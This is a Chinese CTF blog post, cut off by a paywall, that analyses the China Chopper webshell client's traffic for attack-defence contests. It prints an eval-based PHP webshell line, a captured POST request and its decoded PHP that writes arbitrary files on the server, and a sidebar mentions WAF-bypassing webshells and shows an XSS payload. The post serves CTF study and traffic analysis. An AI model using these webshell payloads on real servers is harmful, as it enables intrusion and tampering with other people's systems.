ctf之AWD(3)_重写菜刀

最新推荐文章于 2023-01-17 11:11:17 发布
VIP文章 最新推荐文章于 2023-01-17 11:11:17 发布
阅读量756 收藏 3
点赞数
分类专栏: ctf 文章标签: ctf AWD 菜刀
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38232378/article/details/100903104
版权

ctf之AWD(3)_重写菜刀

原理

多次post

cmd=@eval(base64_decode($_POST[z0]));
#cmd为原密码,z0为新密码

wireshark抓包分析

菜刀2011

post数据分析
&cmd=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B
&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D
&z1=QzpcXFVzZXJzXFxhZG1pbjFcXERlc2t0b3BcXHBocHNcXFdXV1xcdGVzdC50eHQ%3D&z2=61733132333435360D0A6173313233343536

cmd= z0= z1= url和base64解码

cmd=@eval(base64_decode($_POST[z0]));
z0=
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\Users\\admin1\\Desktop\\phps\\WWW\\test.txt
z2内容:
as123456
as123456

z0 简化

@ini_set("display_errors","0");
@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);
$c=$_POST["z2"];
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
菜刀虚拟终端原理
qq_40334963的博客
04-08 1449
菜刀虚拟终端系统命令执行原理分析。 菜刀传输恶意代码的方式:通过调用array_map函数,对敏感字符串做字符串拼接和大小写混合,对核心代码做base64加密。 代码执行步骤: 1.关闭脚本信息报错 2.获取当前文件绝对路径 3.字符串拼接系统命令 4.调用proc_open函数执行拼接的系统命令 5.输出结果 6.结束脚本
CTF之流量分析
热门推荐
shy的博客
06-05 2万+
CTF杂项中存在一种题型——流量分析,主要是给你一个流量包,让你分析获取其中的flag的值。 有5种方式,可以直接查找flag。 1、直接搜索 2、使用notepad++等软件,直接打开流量包,搜索关键字 3、编写python脚本 #encoding:utf-8 #用二进制方式读取文件 file=open("networking.pcap","rb") #读取文件内容 i=file.read() #查找字段 a1=i.find("flag{") a2=i.find("}",a1) #将查
菜刀php木马_菜刀php过waf
weixin_34098846的博客
03-09 749
关于PHP一、waf为啥会拦截菜刀菜刀在连接时,会向server端POST数据,抓包查看:会看到他向server端post了 @eval(base64_decode($_POST[z0])); 一般的waf都会拦截eval的。二、要想菜刀仍然正常工作,就必须让菜刀中的内置的@eval(base64_decode($_POST[z0]));代码不被waf拦截,但又可以传递到server端。方案一:...
技术剖析中国菜刀原理
TsengYUen920的博客
12-24 2256
一、自写脚本 @ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-&gt;|");;print(“hello PHP!”);;echo("|&lt;-");die(); 先用@ini_set(“display_errors”,“0”);临时关闭PHP的错误显示功能 @...
BugKuCTF 分析.1
vegetable_haker的博客
09-29 416
flag被盗 打开题目,发现文件是一个数据包,下载数据包 将下载下来的数据包用wareshark打开,往下滑,发现有一个post请求直接在这条数据包上右键追踪TCP流 发现flag 中国菜刀 下载压缩包,解压 打开数据包,发现第五条数据包有个post请求,在上面追踪TCP流,发现一船base64编码 复制,用在线编码解码,得到一段代码如下,它的作用是读取c:/wwwroot目录下所有文件、目录...
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py ...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF线下AWD脚本合集.zip
03-31
1.CTF线下AWD脚本合集 2.适合网络攻防CTF小白脚本小子,比赛快速拿分 3.适合懒得自己动手编写脚本人群
CTFAWD的waf 用于防止别人读取flag
10-08
CTFAWD的waf 用于防止别人读取flag 。 PHP版本,经过AWD实战。 可用于各种环境下的CTF线下赛
菜刀怎么接mysql_chopper菜刀一句话操作mysql数据库乱码问题 -电脑资料
weixin_30605469的博客
02-07 235
发现gbk等非gb2312的,用菜刀的一句话客户端工具连接后必然乱码,调整工具的编码方式没用,1.抓包base64解密:post变量中z0就是如下语句(没有红色的语句):@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$m=get_magic_quotes_...
fv 06php2c,渗透-简单制作过waf的中国菜刀
weixin_39926540的博客
03-11 194
0x01简单分析web渗透中很常见的情况,用菜刀连接免杀的一句话木马连不上,有waf 除了变形一句话木马为免杀一句话,我们还需要来制作过waf的菜刀进行连接、这里用的一句话为来看看菜刀连接一句话的时候的包 x=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3J...
一句话php木马制作教程_菜刀无法正常访问一句话问题
weixin_35092037的博客
12-21 1749
今天自己搭建了一个php版的xss cookie接收平台。为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
WEBSHELL管理工具流量特征——基础篇
ALLEN'Blog
01-17 1668
今天给大家带来了WEBSHELL管理工具流量特征基础篇,简单介绍了菜刀和蚁剑这两个比较简单的流量特征,之后也会给大家带来别的WEBSHELL管理工具流量分析,如果夏欢本文希望可以一键三连支持一下。
陇剑杯之第九题WiFi之学习
shy的博客
09-29 977
题目描述 网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木马来玩玩upload-labs,并且保存了内存镜像、wifi流量和服务器流量,让您来分析后作答:(本题仅1小问) 答题要求 小王往upload-labs上传木马后进行了cat /flag,flag内容为_____________。(压缩包里有解压密码的提示,需要额外添加花括号) 开始解题 1、解压题目给出的压缩包,发现一个镜像、两个流量包。 2、根据题目分析,小王往服务器上传了后门文件,并且读取了flag文件,题目要去我们.
兵临城下丨Webshell管理工具流量检测研究
C20220511的博客
05-16 673
引言 俗话说得好,80后用菜刀,90后用蚁剑,95后用冰蝎和哥斯拉。本文主要是对这四个主流的并具有跨时代意义的webshell管理工具进行流量分析和检测。 注:本文均以phpshell连接为例进行研究分析,毕竟“php是世界上最好的语言” ① 中国菜刀(chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理。主流有2011版本,2014版本和2016版本。 2011和2014版本: 特征..
Cknife流量分析
weixin_30808693的博客
10-01 957
本文首发:https://<img src=1 onerror=\u006coc\u0061tion='j\x61v\x61script:\x61lert\x281\x29'>testdemo 0x01 环境 <?php eval($_REQUEST['shell'] ?> 0x02 命令执行 执行命令结果如下图所示 POST的数据如下图所示 对P...
中国菜刀使用与原理分析
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀的使用 原理分析
ctf_awd_platform
最新发布
10-23
ctf_awd_platform是指一种特定的AWD平台,其目的是为了提供一个安全的环境,让参赛选手能够在其中进行攻击和防御的实战训练。 在ctf_awd_platform中,参赛选手将分为多个小队,每个小队都需要同时进行攻击和防御。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值